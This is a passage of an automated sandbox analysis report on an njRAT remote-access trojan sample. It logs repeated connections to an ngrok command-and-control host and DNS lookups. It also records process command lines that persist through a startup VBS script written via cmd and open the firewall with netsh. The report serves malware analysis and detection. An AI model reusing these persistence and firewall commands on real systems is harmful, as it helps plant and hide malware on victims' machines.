                                                                      Feb 5, 2024 17:12:36.513665915 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:36.834479094 CET19208497183.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:36.836617947 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:37.780073881 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:38.094635010 CET19208497183.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:39.908974886 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:40.215949059 CET19208497193.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:40.216027975 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:40.522742987 CET19208497193.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:40.522810936 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:42.069120884 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:42.375828028 CET19208497193.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:46.231547117 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:46.541541100 CET19208497203.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:46.541742086 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:46.853147030 CET19208497203.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:46.853238106 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:47.573414087 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:47.883291006 CET19208497203.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:49.592650890 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:49.902971983 CET19208497213.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:49.903121948 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:50.213625908 CET19208497213.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:50.213757992 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:50.977611065 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:51.287813902 CET19208497213.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:53.048609972 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:53.358397007 CET19208497223.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:53.358488083 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:53.668397903 CET19208497223.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:53.668493032 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:55.034301043 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:55.344258070 CET19208497223.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:57.146511078 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:57.458035946 CET19208497233.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:57.458201885 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:57.769925117 CET19208497233.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:57.769987106 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:00.449419022 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:00.761018991 CET19208497233.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:03.844918013 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:04.157108068 CET19208497243.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:04.157234907 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:04.469436884 CET19208497243.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:04.469506025 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:13.604278088 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:13.916524887 CET19208497243.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:22.860435009 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:23.174705982 CET19208497253.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:23.174871922 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:23.493720055 CET19208497253.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:23.496716976 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:59.558134079 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:59.872311115 CET19208497253.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:14:01.907668114 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:02.214173079 CET19208497263.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:02.218672037 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:02.525474072 CET19208497263.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:02.525549889 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:07.579174042 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:07.885520935 CET19208497263.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:19.738795996 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:20.047842979 CET19208497273.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:20.047951937 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:20.355074883 CET19208497273.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:20.355150938 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:15:07.884924889 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:15:08.192624092 CET19208497273.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:15:11.579549074 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:11.892786980 CET19208497283.6.115.182192.168.2.11
                                                                      Feb 5, 2024 17:15:11.892965078 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:12.207818031 CET19208497283.6.115.182192.168.2.11
                                                                      Feb 5, 2024 17:15:12.207933903 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:26.191171885 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:26.504384041 CET19208497283.6.115.182192.168.2.11
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 5, 2024 17:11:44.336168051 CET5409453192.168.2.111.1.1.1
                                                                      Feb 5, 2024 17:11:44.457189083 CET53540941.1.1.1192.168.2.11
                                                                      Feb 5, 2024 17:12:46.096275091 CET6498553192.168.2.111.1.1.1
                                                                      Feb 5, 2024 17:12:46.230243921 CET53649851.1.1.1192.168.2.11
                                                                      Feb 5, 2024 17:14:01.568389893 CET5695553192.168.2.111.1.1.1
                                                                      Feb 5, 2024 17:14:01.688663006 CET53569551.1.1.1192.168.2.11
                                                                      Feb 5, 2024 17:15:10.589945078 CET6348353192.168.2.111.1.1.1
                                                                      Feb 5, 2024 17:15:10.712907076 CET53634831.1.1.1192.168.2.11
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Feb 5, 2024 17:11:44.336168051 CET192.168.2.111.1.1.10x13fStandard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                      Feb 5, 2024 17:12:46.096275091 CET192.168.2.111.1.1.10xfe04Standard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                      Feb 5, 2024 17:14:01.568389893 CET192.168.2.111.1.1.10xe5aaStandard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                      Feb 5, 2024 17:15:10.589945078 CET192.168.2.111.1.1.10x775aStandard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Feb 5, 2024 17:11:44.457189083 CET1.1.1.1192.168.2.110x13fNo error (0)0.tcp.in.ngrok.io3.6.122.107A (IP address)IN (0x0001)false
                                                                      Feb 5, 2024 17:12:46.230243921 CET1.1.1.1192.168.2.110xfe04No error (0)0.tcp.in.ngrok.io3.6.98.232A (IP address)IN (0x0001)false
                                                                      Feb 5, 2024 17:14:01.688663006 CET1.1.1.1192.168.2.110xe5aaNo error (0)0.tcp.in.ngrok.io3.6.122.107A (IP address)IN (0x0001)false
                                                                      Feb 5, 2024 17:15:10.712907076 CET1.1.1.1192.168.2.110x775aNo error (0)0.tcp.in.ngrok.io3.6.115.182A (IP address)IN (0x0001)false

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:1
                                                                      Start time:17:11:18
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:17:11:18
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:17:11:18
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:17:11:19
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:17:11:27
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:17:11:27
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:17:11:27
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:17:11:28
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:17:11:31
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                      Imagebase:0x7ff6c3bf0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:17:11:38
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
                                                                      Imagebase:0x10d0000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:17:11:38
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:17:11:49
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:17:11:49
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:17:11:49
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:17:11:50
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:17:11:58
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
